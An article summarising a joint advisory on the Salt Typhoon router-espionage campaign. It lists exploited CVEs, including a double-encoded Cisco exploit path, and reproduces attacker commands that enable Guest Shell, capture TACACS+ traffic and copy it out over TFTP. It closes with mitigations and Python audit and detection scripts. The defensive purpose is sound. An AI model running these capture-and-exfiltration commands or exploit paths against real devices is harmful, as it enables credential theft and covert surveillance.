Seventeen intelligence and cybersecurity agencies from the United States, United Kingdom, Australia, and allied nations issued an extraordinary joint advisory on August 28, 2025, exposing a multi-year campaign by Chinese state-sponsored hackers to infiltrate core internet routers and build a global espionage network. The operation, tracked as Salt Typhoon, OPERATOR PANDA, RedMike, and UNC5807, has targeted telecommunications providers, governments, and critical infrastructure worldwide, hijacking backbone and edge devices to harvest credentials, mirror traffic, and establish covert collection channels.

The advisory—co-sealed by agencies including the NSA, CISA, FBI, ASD’s ACSC, NCSC-UK, and Germany’s BND—details how the threat actors have systematically exploited publicly known vulnerabilities since 2021, avoiding zero-days in favor of high-impact CVEs in Cisco, Palo Alto Networks, and Ivanti gear. The result is a persistent, deeply embedded espionage capability that threatens the confidentiality of subscriber metadata, authentication exchanges, and entire network flows.

The Playbook: Exploiting Known Flaws for Initial Access

The attackers rely on a familiar set of CVEs, chaining them to gain administrative control of exposed management interfaces and VPN gateways. Among the most abused:

  • CVE-2023-20198 / CVE-2023-20273 (Cisco IOS XE Web UI): A critical authentication bypass (CVE-2023-20198) that lets unauthenticated attackers create privileged accounts, chained with a privilege escalation (CVE-2023-20273) to achieve root-level code execution. The advisory notes the actors obfuscated requests by double-encoding paths, using variants like /%2577eb%2575i_%2577sma_Http to slip past simple filters.
  • CVE-2018-0171 (Cisco Smart Install): A notorious remote code execution flaw still present on unpatched, end‑of‑life devices. Multiple nation‑state groups have weaponized it, and the advisory urges immediate deactivation or patching.
  • CVE-2024-3400 (Palo Alto GlobalProtect): A perfect‑10 severity command injection that enables unauthenticated RCE when GlobalProtect is enabled on certain PAN‑OS versions. Palo Alto’s PSIRT has confirmed active exploitation.
  • CVE-2024-21887 (Ivanti Connect Secure / Policy Secure): A web‑component injection commonly chained after the CVE-2023-46805 authentication bypass, allowing full device takeover.

These CVEs represent low‑hanging fruit that the actors scan for at scale, compromising thousands of internet‑exposed devices across IP ranges and revisiting them for follow‑on operations.

Living Off the Router: Persistence and Evasion

Once inside a device, the attackers abuse native features to blend in and stay hidden. Their hallmark is turning trusted, built‑in capabilities into spyware without deploying custom malware.

Guest Shell and Container Abuse
On Cisco IOS XE and NX‑OS platforms, the actors enable Guest Shell—a Linux container that runs Python, native tools, and even package managers like pip or yum. They use it to stage exploit scripts (e.g., siet.py for Smart Install), parse captured data, and move laterally within the environment. Because Guest Shell uses the management VRF and may not be fully monitored by traditional syslog, activity inside the container often goes unnoticed. The advisory documents commands such as:

guestshell enable
guestshell run bash
./cmd3 <encrypted_config>

And later, to clean up:

guestshell disable
guestshell destroy

Non‑Standard Ports and ACL Tweaks
They enable SSH servers on high, non‑default ports (patterns like 22x22 or xxx22) and alter ACLs to explicitly permit actor‑controlled IPs, often naming the entry access‑list 20. HTTP/HTTPS management services are reconfigured to listen on ports like 18xxx, avoiding signature‑based detection.

IOS XR Host OS Compromise
On Cisco IOS XR devices, the actors activate the sshd_operns service on TCP/57722, create local users, and add them to /etc/sudoers to gain full root on the Linux host. This grants unfettered access to the underlying operating system, bypassing the IOS CLI entirely.

SNMP and AAA Manipulation
They issue SNMP SET requests to redirect TACACS+ and RADIUS servers to attacker‑controlled IPs, capturing authentication traffic. SNMPv1/v2 community strings like “public” and “private” are routinely exploited. The actors also enable SNMP‑based configuration changes and use SNMPwalk to enumerate devices across shared communities.

Stealing Secrets with Built‑In Packet Capture

The campaign’s most insidious technique is the abuse of native packet capture (PCAP) and traffic mirroring. The actors execute commands like:

monitor capture mycap interface GigabitEthernet0/1 both
monitor capture mycap match ipv4 protocol tcp any any eq 49
monitor capture mycap start
monitor capture mycap export bootflash:tac.pcap
copy bootflash:tac.pcap tftp://10.0.0.1/tac.pcap

These sequences target TCP port 49 (TACACS+) and store captures with names like mycap.pcap, tac.pcap, and 1.pcap. TACACS+ protects packet bodies only with a keystream derived from the shared secret, and because those secrets are frequently stored in device configurations using Cisco Type 7 reversible obfuscation, an actor who has read the configuration can decrypt captured authentication packets offline and recover administrator credentials.

SPAN, RSPAN, and ERSPAN sessions are configured to mirror entire VLANs or customer traffic to VPSs or compromised intermediate routers, creating a parallel, invisible surveillance network.

Data leaves the environment not through noisy C2 channels but via peering interconnects, GRE/IPsec tunnels, and protocol misuse. The actors stage encrypted archives on the device and transfer them using custom SFTP clients written in Go. The advisory includes hashes and YARA rules for binaries named cmd1, cmd3, new2, and sft. For example:

File Name   MD5 Hash      Build Path
cmd3        eda9ae70...   C:/work/sync/cmd/cmd3/main.go
cmd1        33e692f4...   C:/work/sync_v1/cmd/cmd1/main.go

These clients accept an encrypted configuration string and are used to push captures to FTP/TFTP staging hosts. Multi‑hop pivot tools like STOWAWAY construct chained, encrypted relays that provide operators with interactive shells and SOCKS5 proxies, further obscuring origin.

A Prioritized Detection and Mitigation Playbook

The advisory offers concrete threat‑hunting guidance for network defenders. Immediate actions include:

Patch and Harden
- Prioritize vendor hotfixes for all listed CVEs. Disable Cisco Smart Install (no vstack), GlobalProtect where possible, and Ivanti remote access if unpatched.
- Place all management services (SSH, SNMP, syslog) in a dedicated management VRF with strict egress filtering and CoPP.
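An added example, not from the advisory or any vendor tool, that turns the hardening list and the persistence techniques described earlier into a static audit of an IOS XE running config: Smart Install not disabled, default SNMP communities, an actor‑style access‑list 20, Type 7 TACACS+ keys, IOx app hosting (which Guest Shell requires), SPAN destinations, and management services on non‑default ports. The config excerpt, hostname, key string and addresses are constructed; `iox` and `no vstack` are assumed to be the relevant IOS XE command names.

```python
import re

# Constructed IOS XE running-config excerpt: the weak settings the advisory calls out
# mixed with benign lines (hypothetical hostname, key material and addresses).
SAMPLE_CONFIG = """\
hostname edge-rtr2
ip http server
ip http secure-port 18443
ip ssh port 22022 rotary 1
snmp-server community public RO
snmp-server community private RW
access-list 20 permit 203.0.113.9
tacacs server ISE1
 address ipv4 10.10.10.5
 key 7 0822455D0A16
iox
monitor session 1 source vlan 100
monitor session 1 destination interface GigabitEthernet0/5
"""

# Per-line checks: (finding, regex). A match on any config line raises the finding.
LINE_CHECKS = [
    ("snmp-default-community", re.compile(r"^snmp-server community (public|private)\b")),
    ("actor-style-acl-20",     re.compile(r"^access-list 20 permit\b")),
    ("tacacs-key-type7",       re.compile(r"^\s+key 7 \S+")),          # reversible obfuscation
    ("span-session",           re.compile(r"^monitor session \d+ destination\b")),
    ("iox-app-hosting",        re.compile(r"^iox\b")),                 # prerequisite for Guest Shell
    ("http-mgmt-enabled",      re.compile(r"^ip http (secure-)?server\b")),
]
PORT_CHECKS = [  # (finding, regex capturing the port, accepted default ports)
    ("ssh-nonstandard-port",  re.compile(r"^ip ssh port (\d+)"), {"22"}),
    ("http-nonstandard-port", re.compile(r"^ip http (?:secure-)?port (\d+)"), {"80", "443"}),
]

def audit_config(text):
    """Return sorted finding names for a running-config; Smart Install is an absence check."""
    findings = set()
    if not re.search(r"^no vstack\s*$", text, re.M):
        findings.add("smart-install-enabled")   # advisory: disable with `no vstack`
    for line in text.splitlines():
        for name, rx in LINE_CHECKS:
            if rx.match(line):
                findings.add(name)
        for name, rx, defaults in PORT_CHECKS:
            m = rx.match(line)
            if m and m.group(1) not in defaults:
                findings.add(name)
    return sorted(findings)
```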

Log and Monitor
- Forward device syslog, AAA command accounting, and Guest Shell logs to an immutable SIEM. Alert on:
  - Commands like monitor capture … start or guestshell enable.
  - New TACACS+/RADIUS server IPs pointing off‑net.
  - Unexpected SNMP SETs, SPAN/ERSPAN session definitions, or GRE/IPsec tunnels.
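A minimal implementation of that alert list, added here as an illustration and not part of the advisory: it scans TACACS+ command‑accounting records (constructed, in a simplified tab‑separated tac_plus‑style layout) for capture, Guest Shell, SPAN, tunnel and non‑default SSH port commands, and flags any AAA server address outside an assumed approved range.

```python
import re
from ipaddress import ip_address, ip_network

# Approved TACACS+/RADIUS server range for this network (assumption for the example).
APPROVED_AAA_NETS = [ip_network("10.10.10.0/24")]
# Indicator rules distilled from the advisory's "Alert on" list: (name, regex on the command).
RULES = [
    ("packet-capture", re.compile(r"^monitor capture \S+ (start|export)\b")),
    ("guestshell",     re.compile(r"^guestshell (enable|run)\b")),
    ("span-session",   re.compile(r"^monitor session \d+ (source|destination)\b")),
    ("gre-tunnel",     re.compile(r"^tunnel mode gre\b")),
]
SSH_PORT = re.compile(r"^ip ssh port (\d+)")
AAA_HOST = re.compile(r"^(?:tacacs-server host|radius-server host|address ipv4) (\d+(?:\.\d+){3})")
CMD_FIELD = re.compile(r"\tcmd=(.*?)(?: <cr>)?$")

def classify(cmd):
    """Return the indicator name for one accounted command, or None if benign."""
    for name, rx in RULES:
        if rx.match(cmd):
            return name
    m = SSH_PORT.match(cmd)
    if m and m.group(1) != "22":
        return "ssh-nonstandard-port"
    m = AAA_HOST.match(cmd)
    if m and not any(ip_address(m.group(1)) in net for net in APPROVED_AAA_NETS):
        return "aaa-server-off-net"
    return None

def scan_accounting(log_text):
    """Return (user, indicator, cmd) for each tab-separated accounting record that hits a rule."""
    hits = []
    for line in log_text.splitlines():
        fields, m = line.split("\t"), CMD_FIELD.search(line)
        if len(fields) < 3 or not m:
            continue
        cmd = m.group(1).strip()
        ind = classify(cmd)
        if ind:
            hits.append((fields[2], ind, cmd))   # fields[2] is the authenticated user
    return hits

def _rec(user, cmd):
    # Constructed tac_plus-style accounting record (tab-separated, simplified; hypothetical hosts).
    return "\t".join(["Aug 28 01:02:09", "10.1.1.1", user, "tty2", "10.9.9.9", "stop",
                      "task_id=1", "service=shell", "priv-lvl=15", f"cmd={cmd} <cr>"])

SAMPLE_LOG = "\n".join([               # one routine AAA change, then the advisory's indicators
    _rec("netops", "address ipv4 10.10.10.5"),
    _rec("admin", "monitor capture mycap start"),
    _rec("svc_mgmt", "guestshell enable"),
    _rec("svc_mgmt", "ip ssh port 22122 rotary 1"),
    _rec("svc_mgmt", "address ipv4 203.0.113.77"),
])
```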

Hunt for Indicators
- Search for TCP/57722 listener on IOS XR hosts and audit sshd_operns status.
- Deploy YARA rules for SFTP binaries (cmd1, cmd3, etc.) and monitor for PCAP file names (mycap, tac.pcap).
- Audit BGP filters and routing tables for unauthorized peerings or static routes.

Coordinate Eviction
- Partial remediation can tip active operators. Coordinate simultaneous eviction across all compromised nodes and involve law enforcement where required.

What This Means for Windows and Enterprise Networks

While the attacks target routers, the downstream risk to Windows environments is severe. Captured TACACS+ and RADIUS credentials often unlock administrative access to switches, firewalls, and, critically, domain infrastructure. A compromised core router can redirect or capture Active Directory traffic, VPN authentication, and internal management flows—effectively acting as a man‑in‑the‑middle for the entire enterprise.

Windows administrators should treat this advisory as a mandate to verify that all edge devices are patched and that authentication traffic is encrypted end‑to‑end. Implement network segmentation that isolates management planes, enforce multi‑factor authentication for router administration, and ensure that device logs are shipped off‑box to a secured collector. The presence of a dual‑use SFTP binary or an unexpected container on a router should trigger an immediate incident response, as the actors may already have footholds inside the broader network.

The CISA advisory, combined with confirmations from Cisco, Palo Alto, and Ivanti, provides the most complete picture yet of a state‑sponsored campaign that has turned the internet’s plumbing into an espionage tool. For defenders, the message is clear: routers are not dumb pipes—they are high‑value targets that must be locked down with the same rigor as any domain controller.